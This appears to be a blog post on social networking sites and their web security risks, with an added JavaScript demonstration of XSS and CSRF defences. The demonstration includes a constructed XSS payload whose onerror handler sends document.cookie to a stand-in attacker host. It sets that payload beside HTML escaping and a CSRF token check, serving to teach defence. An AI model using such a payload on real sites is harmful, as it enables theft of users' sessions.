The whipped cream is out of the can. Now what can we do about it?
Like so many millions of others, I've found Facebook and Twitter in the last few months, in addition to the more traditional professional networking sites I've used for years, like LinkedIn. But what started as idle curiosity soon grew into addiction.
Yes, my name is Ken and I'm addicted to
But gosh darn it, they're fun! I've re-connected with many old friends, and I like knowing what they've done with their lives. OK, we're not likely to become best friends again, but I still value that connection we've made again.
So, how secure are these sites?
I've experienced several classic Web security issues in each of the sites I frequent, and without a doubt there remain many vulnerabilities to be discovered. But that hasn't stopped me from using them.
Like any decision involving risk, I've studied the issues, minimized my own exposure, and I'm getting on with what I care to do.
Let's start by looking at the issues briefly.
And don't think for a moment that web application vulnerabilities only place the application itself at risk. Many also put the app's users at risk: cross-site scripting (XSS), cross-site request forgery (CSRF), and others are aimed squarely at the user's browser and session, and they are easy to exploit.
As a user of a social networking site, you're placing your (and your employer's) data at risk.
The bottom line: by allowing active content into your browser, you are trusting someone else's code to run safely on your computer. Well, what's the big deal? We do that every time we install software. The difference is that this code is dynamic and maintained somewhere else, fetched fresh on every visit, and you're extending that trust every single time. Gulp!
But your browser isn't so discerning. Some of the content that arrives while you're on Facebook might be provided by someone else entirely: another Facebook user, an attacker, or a third-party application hosted on Facebook. If your browser trusts Facebook, chances are it's also going to trust that code: anything that ends up in the Facebook page runs with the same privileges as Facebook's own scripts, including access to your session. This extends the active content exposure pretty substantially.
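To make the "someone else's code in your browser" point concrete, here is an added example (not code from the original post, and not how Facebook or any other site actually works) that simulates a social site rendering another user's status update. The first render splices the text straight into the page, so a crafted status carries an event handler that runs with the site's authority; the second encodes it. The last function shows the CSRF side: a state-changing request is only honoured when it carries a token tied to the session, so a cross-site form post that rides on the session cookie alone is refused. All names, the `hostileStatus` payload and the token value are constructed for the example.

```javascript
// Added example, not from the original post. Simulates a social site's
// profile page built from a user-supplied "status" string, first the way an
// XSS-prone site does it, then with output encoding, plus the request check
// that blunts CSRF. Function names and inputs are hypothetical.

// Constructed attacker input: a status update carrying a script payload that
// would ship the viewer's cookies off to a third party when the image fails
// to load. The second string is an ordinary, harmless status.
const hostileStatus =
  '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">';
const benignStatus = "Back from vacation & feeling great <3";

// The flaw: user text is spliced straight into the page markup, so the
// browser runs whatever another user supplied, with the site's own origin.
function renderStatusUnsafe(status) {
  return `<div class="status">${status}</div>`;
}

// The fix: encode the five HTML-significant characters so user text is
// displayed as text and never parsed as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderStatusSafe(status) {
  return `<div class="status">${escapeHtml(status)}</div>`;
}

// Crude check used below: does the rendered fragment contain a real tag
// carrying an inline event-handler attribute (onerror=, onload=, ...)?
function containsActiveMarkup(html) {
  return /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// CSRF side. The browser attaches the session cookie to any request aimed at
// the site, including one triggered from an attacker's page, so the cookie
// alone must not authorise a change. Require a per-session secret token that
// only a page served by the site could know. `session.csrfToken` is assumed
// to have been generated randomly at login (hypothetical server state).
function handlePostStatus(req, session) {
  if (req.method !== "POST") {
    return { status: 405, reason: "state changes only via POST" };
  }
  if (!req.csrfToken || req.csrfToken !== session.csrfToken) {
    return { status: 403, reason: "missing or mismatched CSRF token" };
  }
  return { status: 200, html: renderStatusSafe(req.body.status) };
}

// Stand-alone demonstration of the contrast.
console.log("unsafe:", renderStatusUnsafe(hostileStatus));
console.log("safe:  ", renderStatusSafe(hostileStatus));
console.log(
  "forged post:",
  handlePostStatus({ method: "POST", body: { status: "pwned" } }, { csrfToken: "t0k3n" })
);
```

Run it with `node` and compare the two rendered fragments: the unsafe one still contains a live `onerror=` handler, the safe one shows the attacker's text as inert characters. In a real deployment the token comparison should be constant-time and the token bound to the session server-side; the point here is only that the cookie the browser sends automatically must never be the sole authority for a change.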